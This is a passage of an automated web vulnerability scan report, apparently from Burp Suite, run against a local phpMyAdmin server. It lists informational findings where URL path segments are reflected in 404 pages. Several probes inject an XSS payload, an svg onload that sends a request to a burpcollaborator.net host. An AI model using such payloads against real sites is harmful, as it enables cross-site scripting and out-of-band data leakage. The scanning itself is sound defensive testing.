User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:14 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 348
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint843am3lc2x/show-hint.js was not found on this server.</p>
...[SNIP]...
19.271. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.jsa5eno9jw5x HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:25 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.jsa5eno9jw5x was not found on this server.</p>
...[SNIP]...
19.272. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//2775xouwutnpzn00cd1b3kac238ywqrqfi562tshh%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 442
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//2775xouwutnpzn00cd1b3kac238ywqrqfi562tshh\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.273. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//ugex6g3o3lwh8f9sl5a3ccj4bvhq5i0ioaeybl29r%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 450
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//ugex6g3o3lwh8f9sl5a3ccj4bvhq5i0ioaeybl29r\56burpcollaborator.net'&gt;/vendor/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.274. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendorfz0fim6z90/codemirror/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:10 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendorfz0fim6z90/codemirror/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.275. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrormdbbvmuha2/addon/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:12 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrormdbbvmuha2/addon/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.276. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addongs3zgtxvbr/hint/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addongs3zgtxvbr/hint/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.277. http://localhost/phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js [URL path folder 6]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/hint/sql-hint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/hintsn7hgjb4b2/sql-hint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 347
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/hintsn7hgjb4b2/sql-hint.js was not found on this server.</p>
...[SNIP]...
19.278. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/lint/lint.jsza1muxeery HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/lint/lint.jsza1muxeery was not found on this server.</p>
...[SNIP]...
19.279. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//pohsebbjbg4cgahnt0iyk7rzjqpldd8gw8mwjj97y%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 438
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//pohsebbjbg4cgahnt0iyk7rzjqpldd8gw8mwjj97y\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.280. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//rytuodlllieeqcrp32s0u911tsznnfii6awytlk99%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 446
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//rytuodlllieeqcrp32s0u911tsznnfii6awytlk99\56burpcollaborator.net'&gt;/vendor/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.281. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendorrc4az2pj3d/codemirror/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:15 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendorrc4az2pj3d/codemirror/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.282. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirroryu2htmesxw/addon/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:19 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirroryu2htmesxw/addon/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.283. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addono46hwqaqh9/lint/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addono46hwqaqh9/lint/lint.js was not found on this server.</p>
...[SNIP]...
19.284. http://localhost/phpmyadmin/js/vendor/codemirror/addon/lint/lint.js [URL path folder 6]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/lint/lint.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/lintiyzweu9xp4/lint.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 343
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/lintiyzweu9xp4/lint.js was not found on this server.</p>
...[SNIP]...
19.285. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path filename]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path filename is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.jsq7sfu53pb1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:50 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.jsq7sfu53pb1 was not found on this server.</p>
...[SNIP]...
19.286. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 1]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 1 is copied into the application's response.

Request 1

GET /'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//0643wmtutrmnylzybb092i9a117wvorff75v2is6h%5c56burpcollaborator.net'%3e/js/vendor/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 444
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /'&quot;&gt;&lt;svg/onload=(new(Image)).src='//0643wmtutrmnylzybb092i9a117wvorff75v2is6h\56burpcollaborator.net'&gt;/js/vendor/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.287. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 2]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 2 is copied into the application's response.

Request 1

GET /phpmyadmin/'%22%3e%3csvg/onload%3d(new(Image)).src%3d'//u61xwgtotlmhyfzsb5032c941v7qvir9f15p2ct0i%5c56burpcollaborator.net'%3e/vendor/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 19 Oct 2018 17:07:27 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 452
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/'&quot;&gt;&lt;svg/onload=(new(Image)).src='//u61xwgtotlmhyfzsb5032c941v7qvir9f15p2ct0i\56burpcollaborator.net'&gt;/vendor/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.288. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 3]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 3 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor5o1pucibya/codemirror/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:17 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor5o1pucibya/codemirror/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.289. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 4]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 4 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirrorrpx524ahbx/addon/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:22 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirrorrpx524ahbx/addon/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.290. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 5]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 5 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon3pnxu6mo5d/runmode/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:29 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /phpmyadmin/js/vendor/codemirror/addon3pnxu6mo5d/runmode/runmode.js was not found on this server.</p>
...[SNIP]...
19.291. http://localhost/phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js [URL path folder 6]
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/codemirror/addon/runmode/runmode.js

Issue detail

The value of the URL path folder 6 is copied into the application's response.

Request 1

GET /phpmyadmin/js/vendor/codemirror/addon/runmode04dgrptw3r/runmode.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 18 Oct 2018 21:21:40 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Length: 349
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
